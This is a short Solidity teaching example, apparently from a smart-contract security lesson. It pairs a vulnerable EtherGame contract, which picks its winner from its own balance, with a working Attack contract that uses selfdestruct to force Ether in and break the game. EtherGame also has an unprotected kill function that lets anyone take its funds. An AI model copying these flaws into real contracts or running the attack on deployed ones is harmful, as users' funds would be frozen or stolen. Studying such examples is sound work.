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selfdestruct challenge.sol
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selfdestruct challenge.sol
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// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// The goal of this game is to be the 7th player to deposit 1 Ether.
// Players can deposit only 1 Ether at a time.
// Winner will be able to withdraw all Ether.
/*
1. Deploy EtherGame
2. Players (say Alice and Bob) decides to play, deposits 1 Ether each.
2. Deploy Attack with address of EtherGame
3. Call Attack.attack sending 5 ether. This will break the game
No one can become the winner.
What happened?
Attack forced the balance of EtherGame to equal 7 ether.
Now no one can deposit and the winner cannot be set.
*/
contract EtherGame {
uint public targetAmount = 7 ether;
address public winner;
constructor() payable{}
function deposit() public payable {
require(msg.value == 1 ether, "You can only send 1 Ether");
uint balance = address(this).balance;
require(balance <= targetAmount, "Game is over");
if (balance == targetAmount) {
winner = msg.sender;
}
}
function claimReward() public {
require(msg.sender == winner, "Not winner");
(bool sent, ) = msg.sender.call{value: address(this).balance}("");
require(sent, "Failed to send Ether");
}
function kill(address _adr) external payable {
selfdestruct(payable(_adr));
}
}
contract Attack {
EtherGame etherGame;
constructor(EtherGame _etherGame) {
etherGame = EtherGame(_etherGame);
}
function attack() public payable {
// You can simply break the game by sending ether so that
// the game balance >= 7 ether
// cast address to payable
address payable addr = payable(address(etherGame));
selfdestruct(addr);
}
}